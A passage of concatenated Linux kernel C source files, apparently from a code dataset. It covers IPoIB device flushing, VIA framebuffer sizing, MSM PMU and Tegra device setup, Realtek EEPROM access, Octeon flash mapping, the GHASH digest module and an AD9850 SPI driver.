	struct ipoib_dev_priv *priv = netdev_priv(dev);

	priv->ca = ca;
	priv->port = port;
	priv->qp = NULL;

	if (ipoib_transport_dev_init(dev, ca)) {
		printk(KERN_WARNING "%s: ipoib_transport_dev_init failed\n", ca->name);
		return -ENODEV;
	}

	setup_timer(&priv->poll_timer, ipoib_ib_tx_timer_func,
		    (unsigned long) dev);

	if (dev->flags & IFF_UP) {
		if (ipoib_ib_dev_open(dev)) {
			/* Undo the transport setup on failure. */
			ipoib_transport_dev_cleanup(dev);
			return -ENODEV;
		}
	}

	return 0;
}
/*
 * Core flush routine, invoked from the three flush work items below.
 * Recursively flushes child (VLAN) interfaces first, then refreshes this
 * interface according to @level:
 *   LIGHT  - invalidate paths and flush multicast state;
 *   NORMAL - additionally take the device down and back up;
 *   HEAVY  - additionally restart the QP if the P_Key index changed.
 */
static void __ipoib_ib_dev_flush(struct ipoib_dev_priv *priv,
				 enum ipoib_flush_level level)
{
	struct ipoib_dev_priv *cpriv;
	struct net_device *dev = priv->dev;
	u16 new_index;

	mutex_lock(&priv->vlan_mutex);

	/*
	 * Flush any child interfaces too -- they might be up even if
	 * the parent is down.
	 */
	list_for_each_entry(cpriv, &priv->child_intfs, list)
		__ipoib_ib_dev_flush(cpriv, level);

	mutex_unlock(&priv->vlan_mutex);

	if (!test_bit(IPOIB_FLAG_INITIALIZED, &priv->flags)) {
		ipoib_dbg(priv, "Not flushing - IPOIB_FLAG_INITIALIZED not set.\n");
		return;
	}

	if (!test_bit(IPOIB_FLAG_ADMIN_UP, &priv->flags)) {
		ipoib_dbg(priv, "Not flushing - IPOIB_FLAG_ADMIN_UP not set.\n");
		return;
	}

	if (level == IPOIB_FLUSH_HEAVY) {
		/* P_Key vanished from the port table: stop and poll for it. */
		if (ib_find_pkey(priv->ca, priv->port, priv->pkey, &new_index)) {
			clear_bit(IPOIB_PKEY_ASSIGNED, &priv->flags);
			ipoib_ib_dev_down(dev, 0);
			ipoib_ib_dev_stop(dev, 0);
			if (ipoib_pkey_dev_delay_open(dev))
				return;
		}

		/* restart QP only if P_Key index is changed */
		/*
		 * NOTE: if ib_find_pkey() failed above, ASSIGNED was just
		 * cleared, so test_and_set_bit() returns 0 and short-circuits
		 * before new_index (uninitialized in that case) is read.
		 */
		if (test_and_set_bit(IPOIB_PKEY_ASSIGNED, &priv->flags) &&
		    new_index == priv->pkey_index) {
			ipoib_dbg(priv, "Not flushing - P_Key index not changed.\n");
			return;
		}
		priv->pkey_index = new_index;
	}

	if (level == IPOIB_FLUSH_LIGHT) {
		ipoib_mark_paths_invalid(dev);
		ipoib_mcast_dev_flush(dev);
	}

	if (level >= IPOIB_FLUSH_NORMAL)
		ipoib_ib_dev_down(dev, 0);

	if (level == IPOIB_FLUSH_HEAVY) {
		ipoib_ib_dev_stop(dev, 0);
		ipoib_ib_dev_open(dev);
	}

	/*
	 * The device could have been brought down between the start and when
	 * we get here, don't bring it back up if it's not configured up
	 */
	if (test_bit(IPOIB_FLAG_ADMIN_UP, &priv->flags)) {
		if (level >= IPOIB_FLUSH_NORMAL)
			ipoib_ib_dev_up(dev);
		ipoib_mcast_restart_task(&priv->restart_task);
	}
}
/* Work-item wrapper: run a LIGHT-level flush for the owning interface. */
void ipoib_ib_dev_flush_light(struct work_struct *work)
{
	struct ipoib_dev_priv *priv;

	priv = container_of(work, struct ipoib_dev_priv, flush_light);
	__ipoib_ib_dev_flush(priv, IPOIB_FLUSH_LIGHT);
}
/* Work-item wrapper: run a NORMAL-level flush for the owning interface. */
void ipoib_ib_dev_flush_normal(struct work_struct *work)
{
	struct ipoib_dev_priv *priv;

	priv = container_of(work, struct ipoib_dev_priv, flush_normal);
	__ipoib_ib_dev_flush(priv, IPOIB_FLUSH_NORMAL);
}
/* Work-item wrapper: run a HEAVY-level flush for the owning interface. */
void ipoib_ib_dev_flush_heavy(struct work_struct *work)
{
	struct ipoib_dev_priv *priv;

	priv = container_of(work, struct ipoib_dev_priv, flush_heavy);
	__ipoib_ib_dev_flush(priv, IPOIB_FLUSH_HEAVY);
}
/*
 * Final teardown counterpart of ipoib_ib_dev_init(): stop the multicast
 * thread (flushing synchronously), flush multicast state, and release the
 * transport resources.
 */
void ipoib_ib_dev_cleanup(struct net_device *dev)
{
	struct ipoib_dev_priv *priv = netdev_priv(dev);

	ipoib_dbg(priv, "cleaning up ib_dev\n");

	ipoib_mcast_stop_thread(dev, 1);
	ipoib_mcast_dev_flush(dev);

	ipoib_transport_dev_cleanup(dev);
}
/*
 * Delayed P_Key Assignment Interim Support
 *
 * The following is an initial implementation of the delayed P_Key
 * assignment mechanism.  It uses the same approach implemented for the
 * multicast group join.  The single goal of this implementation is to
 * quickly address Bug #2507.  This implementation will probably be removed
 * when the P_Key change async notification is available.
 */
/*
 * Delayed work that polls for the interface's P_Key to appear in the port
 * table.  Once present, the device is opened; otherwise the poll re-arms
 * itself once per second unless IPOIB_PKEY_STOP has been set (checked
 * under pkey_mutex to serialize against cancellation).
 */
void ipoib_pkey_poll(struct work_struct *work)
{
	struct ipoib_dev_priv *priv =
		container_of(work, struct ipoib_dev_priv, pkey_poll_task.work);
	struct net_device *dev = priv->dev;

	ipoib_pkey_dev_check_presence(dev);

	if (test_bit(IPOIB_PKEY_ASSIGNED, &priv->flags))
		ipoib_open(dev);
	else {
		mutex_lock(&pkey_mutex);
		if (!test_bit(IPOIB_PKEY_STOP, &priv->flags))
			queue_delayed_work(ipoib_workqueue,
					   &priv->pkey_poll_task,
					   HZ);
		mutex_unlock(&pkey_mutex);
	}
}
/*
 * If the interface's P_Key is not yet present in the port table, start the
 * polling work above and return 1 ("open delayed"); return 0 when the
 * P_Key is already assigned and the caller may proceed to open the device.
 */
int ipoib_pkey_dev_delay_open(struct net_device *dev)
{
	struct ipoib_dev_priv *priv = netdev_priv(dev);

	/* Look for the interface pkey value in the IB Port P_Key table and */
	/* set the interface pkey assignment flag */
	ipoib_pkey_dev_check_presence(dev);

	/* P_Key value not assigned yet - start polling */
	if (!test_bit(IPOIB_PKEY_ASSIGNED, &priv->flags)) {
		mutex_lock(&pkey_mutex);
		clear_bit(IPOIB_PKEY_STOP, &priv->flags);
		queue_delayed_work(ipoib_workqueue,
				   &priv->pkey_poll_task,
				   HZ);
		mutex_unlock(&pkey_mutex);
		return 1;
	}

	return 0;
}
| gpl-2.0 |
RonGokhale/lge-kernel-pecan | drivers/video/via/iface.c | 772 | 2290 | /*
* Copyright 1998-2008 VIA Technologies, Inc. All Rights Reserved.
* Copyright 2001-2008 S3 Graphics, Inc. All Rights Reserved.
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public
* License as published by the Free Software Foundation;
* either version 2, or (at your option) any later version.
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTIES OR REPRESENTATIONS; without even
* the implied warranty of MERCHANTABILITY or FITNESS FOR
* A PARTICULAR PURPOSE.See the GNU General Public License
* for more details.
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc.,
* 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*/
#include "global.h"
/* Get frame buffer size from VGA BIOS */
unsigned int viafb_get_memsize(void)
{
	unsigned int size;

	if (viafb_memsize) {
		/* Size was supplied by the user (module parameter), in MB. */
		size = viafb_memsize * Mb;
	} else {
		/* Derive it from scratch register SR39, in units of 4 MB. */
		size = (unsigned int)viafb_read_reg(VIASR, SR39) * (4 * Mb);
		/* Fall back to a safe 16 MB for implausible readings. */
		if (size < (16 * Mb) || size > (64 * Mb))
			size = 16 * Mb;
	}

	DEBUG_MSG(KERN_INFO "framebuffer size = %d Mb\n", size / Mb);
	return size;
}
/* Get Video Buffer Starting Physical Address(back door)*/
/*
 * Compute the physical start of the video buffer by reading the K800
 * north-bridge configuration: total system memory minus the carved-out
 * video memory.  If the bridge is not found, fall back to a hard-coded
 * layout (256 MB system / 64 MB video => 0x0C000000).
 */
unsigned long viafb_get_videobuf_addr(void)
{
	struct pci_dev *pdev = NULL;
	unsigned char sys_mem;
	unsigned char video_mem;
	unsigned long sys_mem_size;
	unsigned long video_mem_size;
	/*system memory = 256 MB, video memory 64 MB */
	unsigned long vmem_starting_adr = 0x0C000000;

	pdev =
	    (struct pci_dev *)pci_get_device(VIA_K800_BRIDGE_VID,
					     VIA_K800_BRIDGE_DID, NULL);
	if (pdev != NULL) {
		pci_read_config_byte(pdev, VIA_K800_SYSTEM_MEMORY_REG,
				     &sys_mem);
		pci_read_config_byte(pdev, VIA_K800_VIDEO_MEMORY_REG,
				     &video_mem);
		/* Video memory size is encoded in bits 6:4 as a power of two (MB). */
		video_mem = (video_mem & 0x70) >> 4;
		sys_mem_size = ((unsigned long)sys_mem) << 24;
		if (video_mem != 0)
			video_mem_size = (1 << (video_mem)) * 1024 * 1024;
		else
			video_mem_size = 0;

		vmem_starting_adr = sys_mem_size - video_mem_size;
		/* Drop the reference taken by pci_get_device(). */
		pci_dev_put(pdev);
	}

	DEBUG_MSG(KERN_INFO "Video Memory Starting Address = %lx \n",
		  vmem_starting_adr);
	return vmem_starting_adr;
}
| gpl-2.0 |
Ca1ne/Enoch213 | arch/arm/mach-msm/pmu.c | 772 | 1494 | /* Copyright (c) 2010-2011, Code Aurora Forum. All rights reserved.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 and
* only version 2 as published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*/
#include <linux/platform_device.h>
#include <asm/pmu.h>
#include <mach/irqs.h>
/* IRQ resource for the per-CPU performance monitoring unit. */
static struct resource cpu_pmu_resource = {
	.start = INT_ARMQC_PERFMON,
	.end = INT_ARMQC_PERFMON,
	.flags = IORESOURCE_IRQ,
};

#ifdef CONFIG_CPU_HAS_L2_PMU
/* IRQ resource for the L2 cache PMU (only on SoCs that have one). */
static struct resource l2_pmu_resource = {
	.start = SC_SICL2PERFMONIRPTREQ,
	.end = SC_SICL2PERFMONIRPTREQ,
	.flags = IORESOURCE_IRQ,
};

static struct platform_device l2_pmu_device = {
	.name		= "l2-arm-pmu",
	.id		= ARM_PMU_DEVICE_L2,
	.resource	= &l2_pmu_resource,
	.num_resources	= 1,
};

#endif

static struct platform_device cpu_pmu_device = {
	.name		= "cpu-arm-pmu",
	.id		= ARM_PMU_DEVICE_CPU,
	.resource	= &cpu_pmu_resource,
	.num_resources	= 1,
};

/* All PMU devices to register; the L2 entry is conditional on the config. */
static struct platform_device *pmu_devices[] = {
	&cpu_pmu_device,
#ifdef CONFIG_CPU_HAS_L2_PMU
	&l2_pmu_device,
#endif
};
/* Register the CPU (and optional L2) PMU platform devices at arch-init time. */
static int __init msm_pmu_init(void)
{
	return platform_add_devices(pmu_devices, ARRAY_SIZE(pmu_devices));
}

arch_initcall(msm_pmu_init);
| gpl-2.0 |
akca/android_kernel_xiaomi_msm8996 | drivers/staging/rtl8192e/rtl8192e/rtl_eeprom.c | 1540 | 3665 | /******************************************************************************
* Copyright(c) 2008 - 2010 Realtek Corporation. All rights reserved.
*
* Based on the r8180 driver, which is:
* Copyright 2004-2005 Andrea Merello <andrea.merello@gmail.com>, et al.
* This program is free software; you can redistribute it and/or modify it
* under the terms of version 2 of the GNU General Public License as
* published by the Free Software Foundation.
*
* This program is distributed in the hope that it will be useful, but WITHOUT
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
* FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for
* more details.
*
* You should have received a copy of the GNU General Public License along with
* this program; if not, write to the Free Software Foundation, Inc.,
* 51 Franklin Street, Fifth Floor, Boston, MA 02110, USA
*
* The full GNU General Public License is included in this distribution in the
* file called LICENSE.
*
* Contact Information:
* wlanfae <wlanfae@realtek.com>
******************************************************************************/
#include "rtl_core.h"
#include "rtl_eeprom.h"
/* Assert (bit != 0) or deassert the serial EEPROM chip-select line. */
static void eprom_cs(struct net_device *dev, short bit)
{
	if (bit)
		/* Set CS while preserving the other command-register bits. */
		write_nic_byte(dev, EPROM_CMD,
			       read_nic_byte(dev, EPROM_CMD) |
			       (1 << EPROM_CS_SHIFT));
	else
		/* Clear CS while preserving the other command-register bits. */
		write_nic_byte(dev, EPROM_CMD,
			       read_nic_byte(dev, EPROM_CMD) &
			       ~(1 << EPROM_CS_SHIFT));

	udelay(EPROM_DELAY);
}
/* Pulse the EEPROM serial clock: raise it, wait, drop it, wait. */
static void eprom_ck_cycle(struct net_device *dev)
{
	write_nic_byte(dev, EPROM_CMD,
		       read_nic_byte(dev, EPROM_CMD) | (1 << EPROM_CK_SHIFT));
	udelay(EPROM_DELAY);

	write_nic_byte(dev, EPROM_CMD,
		       read_nic_byte(dev, EPROM_CMD) & ~(1 << EPROM_CK_SHIFT));
	udelay(EPROM_DELAY);
}
/* Drive the EEPROM data-in line high (bit != 0) or low. */
static void eprom_w(struct net_device *dev, short bit)
{
	if (bit)
		write_nic_byte(dev, EPROM_CMD,
			       read_nic_byte(dev, EPROM_CMD) |
			       (1 << EPROM_W_SHIFT));
	else
		write_nic_byte(dev, EPROM_CMD,
			       read_nic_byte(dev, EPROM_CMD) &
			       ~(1 << EPROM_W_SHIFT));

	udelay(EPROM_DELAY);
}
/* Sample the EEPROM data-out line; returns 1 if high, 0 if low. */
static short eprom_r(struct net_device *dev)
{
	short bit = read_nic_byte(dev, EPROM_CMD) & (1 << EPROM_R_SHIFT);

	udelay(EPROM_DELAY);

	return bit ? 1 : 0;
}
/* Clock out @len bits from @b, MSB first as ordered by the caller. */
static void eprom_send_bits_string(struct net_device *dev, short b[], int len)
{
	int idx;

	for (idx = 0; idx < len; idx++) {
		eprom_w(dev, b[idx]);
		eprom_ck_cycle(dev);
	}
}
/*
 * Bit-bang a 16-bit word out of the serial EEPROM at word address @addr.
 * The address width depends on the part: 8 bits for a 93C56, 6 bits for
 * the smaller 93C46-style part.  Returns the 16-bit value in the low bits
 * of a u32.
 */
u32 eprom_read(struct net_device *dev, u32 addr)
{
	struct r8192_priv *priv = rtllib_priv(dev);
	short read_cmd[] = {1, 1, 0};	/* start bit + READ opcode */
	short addr_str[8];
	int i;
	int addr_len;
	u32 ret;

	ret = 0;
	/* Switch the NIC into EEPROM programming mode first. */
	write_nic_byte(dev, EPROM_CMD,
		       (EPROM_CMD_PROGRAM << EPROM_CMD_OPERATING_MODE_SHIFT));
	udelay(EPROM_DELAY);

	/* Unpack the address into individual bits, MSB first. */
	if (priv->epromtype == EEPROM_93C56) {
		addr_str[7] = addr & 1;
		addr_str[6] = addr & (1<<1);
		addr_str[5] = addr & (1<<2);
		addr_str[4] = addr & (1<<3);
		addr_str[3] = addr & (1<<4);
		addr_str[2] = addr & (1<<5);
		addr_str[1] = addr & (1<<6);
		addr_str[0] = addr & (1<<7);
		addr_len = 8;
	} else {
		addr_str[5] = addr & 1;
		addr_str[4] = addr & (1<<1);
		addr_str[3] = addr & (1<<2);
		addr_str[2] = addr & (1<<3);
		addr_str[1] = addr & (1<<4);
		addr_str[0] = addr & (1<<5);
		addr_len = 6;
	}
	eprom_cs(dev, 1);
	eprom_ck_cycle(dev);
	eprom_send_bits_string(dev, read_cmd, 3);
	eprom_send_bits_string(dev, addr_str, addr_len);

	eprom_w(dev, 0);

	/* Clock in the 16 data bits, MSB first. */
	for (i = 0; i < 16; i++) {
		eprom_ck_cycle(dev);
		ret |= (eprom_r(dev)<<(15-i));
	}

	eprom_cs(dev, 0);
	eprom_ck_cycle(dev);

	/* Restore normal operating mode. */
	write_nic_byte(dev, EPROM_CMD,
		       (EPROM_CMD_NORMAL<<EPROM_CMD_OPERATING_MODE_SHIFT));
	return ret;
}
| gpl-2.0 |
denggww123/EmbedSky-linux-2.6.30.4 | arch/mips/cavium-octeon/flash_setup.c | 1796 | 2184 | /*
* Octeon Bootbus flash setup
*
* This file is subject to the terms and conditions of the GNU General Public
* License. See the file "COPYING" in the main directory of this archive
* for more details.
*
* Copyright (C) 2007, 2008 Cavium Networks
*/
#include <linux/kernel.h>
#include <linux/mtd/mtd.h>
#include <linux/mtd/map.h>
#include <linux/mtd/partitions.h>
#include <asm/octeon/octeon.h>
/* MTD mapping and device handle for the bootbus NOR flash. */
static struct map_info flash_map;
static struct mtd_info *mymtd;
#ifdef CONFIG_MTD_PARTITIONS
static int nr_parts;
static struct mtd_partition *parts;
/* Partition parsers to try, in order; kernel command line wins. */
static const char *part_probe_types[] = {
	"cmdlinepart",
#ifdef CONFIG_MTD_REDBOOT_PARTS
	"RedBoot",
#endif
	NULL
};
#endif
/**
 * Module/ driver initialization.
 *
 * Probes bootbus region 0 for a CFI flash, maps it, and registers the
 * resulting MTD device (with partitions when partition support is built
 * in).  Runs as a late initcall so the MTD core is ready.
 *
 * Returns Zero on success
 */
static int __init flash_init(void)
{
	/*
	 * Read the bootbus region 0 setup to determine the base
	 * address of the flash.
	 */
	union cvmx_mio_boot_reg_cfgx region_cfg;
	region_cfg.u64 = cvmx_read_csr(CVMX_MIO_BOOT_REG_CFGX(0));
	if (region_cfg.s.en) {
		/*
		 * The bootloader always takes the flash and sets its
		 * address so the entire flash fits below
		 * 0x1fc00000. This way the flash aliases to
		 * 0x1fc00000 for booting. Software can access the
		 * full flash at the true address, while core boot can
		 * access 4MB.
		 */
		/* Use this name so old part lines work */
		flash_map.name = "phys_mapped_flash";
		flash_map.phys = region_cfg.s.base << 16;
		flash_map.size = 0x1fc00000 - flash_map.phys;
		flash_map.bankwidth = 1;
		flash_map.virt = ioremap(flash_map.phys, flash_map.size);
		pr_notice("Bootbus flash: Setting flash for %luMB flash at "
			  "0x%08llx\n", flash_map.size >> 20, flash_map.phys);
		simple_map_init(&flash_map);
		mymtd = do_map_probe("cfi_probe", &flash_map);
		if (mymtd) {
			mymtd->owner = THIS_MODULE;

#ifdef CONFIG_MTD_PARTITIONS
			/* Prefer a parsed partition table; else one flat device. */
			nr_parts = parse_mtd_partitions(mymtd,
							part_probe_types,
							&parts, 0);
			if (nr_parts > 0)
				add_mtd_partitions(mymtd, parts, nr_parts);
			else
				add_mtd_device(mymtd);
#else
			add_mtd_device(mymtd);
#endif
		} else {
			pr_err("Failed to register MTD device for flash\n");
		}
	}
	return 0;
}

late_initcall(flash_init);
| gpl-2.0 |
yasker/linux | crypto/ghash-generic.c | 2052 | 3836 | /*
* GHASH: digest algorithm for GCM (Galois/Counter Mode).
*
* Copyright (c) 2007 Nokia Siemens Networks - Mikko Herranen <mh1@iki.fi>
* Copyright (c) 2009 Intel Corp.
* Author: Huang Ying <ying.huang@intel.com>
*
* The algorithm implementation is copied from gcm.c.
*
* This program is free software; you can redistribute it and/or modify it
* under the terms of the GNU General Public License version 2 as published
* by the Free Software Foundation.
*/
#include <crypto/algapi.h>
#include <crypto/gf128mul.h>
#include <crypto/internal/hash.h>
#include <linux/crypto.h>
#include <linux/init.h>
#include <linux/kernel.h>
#include <linux/module.h>
/* GHASH operates on 128-bit (16-byte) blocks and produces a 16-byte digest. */
#define GHASH_BLOCK_SIZE	16
#define GHASH_DIGEST_SIZE	16

/* Per-tfm state: the precomputed 4K multiplication table for key H. */
struct ghash_ctx {
	struct gf128mul_4k *gf128;
};

/* Per-request state: the running digest plus a partial-block byte count. */
struct ghash_desc_ctx {
	u8 buffer[GHASH_BLOCK_SIZE];
	u32 bytes;
};
/* Reset the per-request state: zero digest, no buffered partial block. */
static int ghash_init(struct shash_desc *desc)
{
	memset(shash_desc_ctx(desc), 0, sizeof(struct ghash_desc_ctx));
	return 0;
}
/*
 * Install the 16-byte hash key H: free any previous multiplication table
 * and precompute a new 4K table for it.  Returns -EINVAL for a wrong key
 * length or -ENOMEM if the table allocation fails.
 */
static int ghash_setkey(struct crypto_shash *tfm,
			const u8 *key, unsigned int keylen)
{
	struct ghash_ctx *ctx = crypto_shash_ctx(tfm);

	if (keylen != GHASH_BLOCK_SIZE) {
		crypto_shash_set_flags(tfm, CRYPTO_TFM_RES_BAD_KEY_LEN);
		return -EINVAL;
	}

	/* Re-keying: discard the table built for the previous key. */
	if (ctx->gf128)
		gf128mul_free_4k(ctx->gf128);
	ctx->gf128 = gf128mul_init_4k_lle((be128 *)key);
	if (!ctx->gf128)
		return -ENOMEM;

	return 0;
}
/*
 * Absorb @srclen bytes: complete any buffered partial block first, then
 * process whole 16-byte blocks (XOR into the digest, multiply by H), and
 * finally stash the remaining tail bytes for the next call.  Fails with
 * -ENOKEY if setkey was never called.
 */
static int ghash_update(struct shash_desc *desc,
			const u8 *src, unsigned int srclen)
{
	struct ghash_desc_ctx *dctx = shash_desc_ctx(desc);
	struct ghash_ctx *ctx = crypto_shash_ctx(desc->tfm);
	u8 *dst = dctx->buffer;

	if (!ctx->gf128)
		return -ENOKEY;

	/* First fill up any partial block left over from the last update. */
	if (dctx->bytes) {
		int n = min(srclen, dctx->bytes);
		u8 *pos = dst + (GHASH_BLOCK_SIZE - dctx->bytes);

		dctx->bytes -= n;
		srclen -= n;

		while (n--)
			*pos++ ^= *src++;

		/* Block completed: fold it into the digest. */
		if (!dctx->bytes)
			gf128mul_4k_lle((be128 *)dst, ctx->gf128);
	}

	/* Process full blocks directly. */
	while (srclen >= GHASH_BLOCK_SIZE) {
		crypto_xor(dst, src, GHASH_BLOCK_SIZE);
		gf128mul_4k_lle((be128 *)dst, ctx->gf128);
		src += GHASH_BLOCK_SIZE;
		srclen -= GHASH_BLOCK_SIZE;
	}

	/* Buffer the tail; dctx->bytes counts bytes still NEEDED to fill it. */
	if (srclen) {
		dctx->bytes = GHASH_BLOCK_SIZE - srclen;
		while (srclen--)
			*dst++ ^= *src++;
	}

	return 0;
}
/*
 * Finish off a buffered partial block.  The missing bytes are zero-padded
 * (the XOR-with-zero loop is the padding written explicitly; it leaves the
 * buffer unchanged) and the block is folded into the digest.
 */
static void ghash_flush(struct ghash_ctx *ctx, struct ghash_desc_ctx *dctx)
{
	u8 *dst = dctx->buffer;

	if (dctx->bytes) {
		u8 *tmp = dst + (GHASH_BLOCK_SIZE - dctx->bytes);

		while (dctx->bytes--)
			*tmp++ ^= 0;

		gf128mul_4k_lle((be128 *)dst, ctx->gf128);
	}

	dctx->bytes = 0;
}
/*
 * Flush any buffered partial block and copy the 16-byte digest to @dst.
 * Fails with -ENOKEY if no key was ever set (prevents hashing with an
 * uninitialized multiplication table).
 */
static int ghash_final(struct shash_desc *desc, u8 *dst)
{
	struct ghash_desc_ctx *dctx = shash_desc_ctx(desc);
	struct ghash_ctx *ctx = crypto_shash_ctx(desc->tfm);
	u8 *buf = dctx->buffer;

	if (!ctx->gf128)
		return -ENOKEY;

	ghash_flush(ctx, dctx);
	memcpy(dst, buf, GHASH_BLOCK_SIZE);

	return 0;
}
/* Tfm destructor: release the key's multiplication table, if one was set. */
static void ghash_exit_tfm(struct crypto_tfm *tfm)
{
	struct ghash_ctx *ctx = crypto_tfm_ctx(tfm);
	if (ctx->gf128)
		gf128mul_free_4k(ctx->gf128);
}
/* Algorithm descriptor registered with the crypto API under "ghash". */
static struct shash_alg ghash_alg = {
	.digestsize	= GHASH_DIGEST_SIZE,
	.init		= ghash_init,
	.update		= ghash_update,
	.final		= ghash_final,
	.setkey		= ghash_setkey,
	.descsize	= sizeof(struct ghash_desc_ctx),
	.base		= {
		.cra_name		= "ghash",
		.cra_driver_name	= "ghash-generic",
		.cra_priority		= 100,	/* low: HW drivers override this */
		.cra_flags		= CRYPTO_ALG_TYPE_SHASH,
		.cra_blocksize		= GHASH_BLOCK_SIZE,
		.cra_ctxsize		= sizeof(struct ghash_ctx),
		.cra_module		= THIS_MODULE,
		.cra_exit		= ghash_exit_tfm,
	},
};

static int __init ghash_mod_init(void)
{
	return crypto_register_shash(&ghash_alg);
}

static void __exit ghash_mod_exit(void)
{
	crypto_unregister_shash(&ghash_alg);
}

module_init(ghash_mod_init);
module_exit(ghash_mod_exit);

MODULE_LICENSE("GPL");
MODULE_DESCRIPTION("GHASH Message Digest Algorithm");
MODULE_ALIAS_CRYPTO("ghash");
MODULE_ALIAS_CRYPTO("ghash-generic");
| gpl-2.0 |
javilonas/Lonas_KL-GT-I9300-OMNI | drivers/staging/iio/dds/ad9850.c | 2308 | 3238 | /*
* Driver for ADI Direct Digital Synthesis ad9850
*
* Copyright (c) 2010-2010 Analog Devices Inc.
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
*/
#include <linux/types.h>
#include <linux/mutex.h>
#include <linux/device.h>
#include <linux/spi/spi.h>
#include <linux/slab.h>
#include <linux/sysfs.h>
#include "../iio.h"
#include "../sysfs.h"
#define DRV_NAME "ad9850"

/* NOTE(review): value_mask/addr_shift are declared but unused in this file. */
#define value_mask (u16)0xf000
#define addr_shift 12

/* Register format: 4 bits addr + 12 bits value */
/* Raw 40-bit (5-byte) control word sent to the AD9850 over SPI. */
struct ad9850_config {
	u8 control[5];
};

/* Driver state: serializes SPI access and holds the IIO/SPI handles. */
struct ad9850_state {
	struct mutex lock;
	struct iio_dev *idev;
	struct spi_device *sdev;
};
/*
 * sysfs "dds" store: forward the raw AD9850 control-word bytes written by
 * userspace directly to the chip over SPI.
 *
 * Returns the number of bytes consumed on success, a negative errno on
 * SPI failure.
 *
 * Fix: the spi_transfer was previously an uninitialized stack variable
 * with only .len and .tx_buf assigned, so the SPI core consumed garbage
 * in fields such as speed_hz, bits_per_word and delay_usecs.  Designated
 * initialization zeroes everything else.  The pointless
 * "if (ret) goto error_ret; error_ret:" fall-through and the const-cast
 * of @buf are gone as well.
 */
static ssize_t ad9850_set_parameter(struct device *dev,
					struct device_attribute *attr,
					const char *buf,
					size_t len)
{
	struct spi_message msg;
	struct spi_transfer xfer = {
		.len = len,
		.tx_buf = buf,	/* tx_buf is const void *, no cast needed */
	};
	int ret;
	struct iio_dev *idev = dev_get_drvdata(dev);
	struct ad9850_state *st = idev->dev_data;

	mutex_lock(&st->lock);

	spi_message_init(&msg);
	spi_message_add_tail(&xfer, &msg);
	ret = spi_sync(st->sdev, &msg);

	mutex_unlock(&st->lock);

	return ret ? ret : len;
}
/* Write-only "dds" attribute: userspace writes raw control words through it. */
static IIO_DEVICE_ATTR(dds, S_IWUSR, NULL, ad9850_set_parameter, 0);

static struct attribute *ad9850_attributes[] = {
	&iio_dev_attr_dds.dev_attr.attr,
	NULL,
};

static const struct attribute_group ad9850_attribute_group = {
	.name = DRV_NAME,
	.attrs = ad9850_attributes,
};

static const struct iio_info ad9850_info = {
	.attrs = &ad9850_attribute_group,
	.driver_module = THIS_MODULE,
};
/*
 * Probe: allocate driver state and an IIO device, register it, then
 * configure the SPI link (2 MHz, mode 3, 16-bit words).  Error paths
 * unwind in reverse order of allocation.
 */
static int __devinit ad9850_probe(struct spi_device *spi)
{
	struct ad9850_state *st;
	int ret = 0;

	st = kzalloc(sizeof(*st), GFP_KERNEL);
	if (st == NULL) {
		ret = -ENOMEM;
		goto error_ret;
	}
	spi_set_drvdata(spi, st);

	mutex_init(&st->lock);
	st->sdev = spi;

	st->idev = iio_allocate_device(0);
	if (st->idev == NULL) {
		ret = -ENOMEM;
		goto error_free_st;
	}
	st->idev->dev.parent = &spi->dev;

	st->idev->info = &ad9850_info;
	st->idev->dev_data = (void *)(st);
	st->idev->modes = INDIO_DIRECT_MODE;

	ret = iio_device_register(st->idev);
	if (ret)
		goto error_free_dev;
	/* Bus parameters are fixed by the AD9850's serial interface. */
	spi->max_speed_hz = 2000000;
	spi->mode = SPI_MODE_3;
	spi->bits_per_word = 16;
	spi_setup(spi);

	return 0;

error_free_dev:
	iio_free_device(st->idev);
error_free_st:
	kfree(st);
error_ret:
	return ret;
}
/* Remove: unregister the IIO device and free the driver state. */
static int __devexit ad9850_remove(struct spi_device *spi)
{
	struct ad9850_state *st = spi_get_drvdata(spi);

	iio_device_unregister(st->idev);
	kfree(st);

	return 0;
}
/* SPI driver glue: bound by device name "ad9850". */
static struct spi_driver ad9850_driver = {
	.driver = {
		.name = DRV_NAME,
		.owner = THIS_MODULE,
	},
	.probe = ad9850_probe,
	.remove = __devexit_p(ad9850_remove),
};

static __init int ad9850_spi_init(void)
{
	return spi_register_driver(&ad9850_driver);
}
module_init(ad9850_spi_init);

static __exit void ad9850_spi_exit(void)
{
	spi_unregister_driver(&ad9850_driver);
}
module_exit(ad9850_spi_exit);

MODULE_AUTHOR("Cliff Cai");
MODULE_DESCRIPTION("Analog Devices ad9850 driver");
MODULE_LICENSE("GPL v2");
| gpl-2.0 |
1DeMaCr/android_hd_kernel_samsung_codina | arch/arm/mach-tegra/devices.c | 2308 | 12034 | /*
* Copyright (C) 2010,2011 Google, Inc.
*
* Author:
* Colin Cross <ccross@android.com>
* Erik Gilling <ccross@android.com>
*
* This software is licensed under the terms of the GNU General Public
* License version 2, as published by the Free Software Foundation, and
* may be copied, distributed, and modified under those terms.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
*/
#include <linux/resource.h>
#include <linux/platform_device.h>
#include <linux/dma-mapping.h>
#include <linux/fsl_devices.h>
#include <linux/serial_8250.h>
#include <asm/pmu.h>
#include <mach/irqs.h>
#include <mach/iomap.h>
#include <mach/dma.h>
/*
 * IRQ + MMIO resources and platform devices for the four Tegra I2C
 * controllers.  Instance 3 (id 3) is the DVC bus, an I2C controller with
 * additional power-management plumbing.  Board files supply platform_data.
 */
static struct resource i2c_resource1[] = {
	[0] = {
		.start	= INT_I2C,
		.end	= INT_I2C,
		.flags	= IORESOURCE_IRQ,
	},
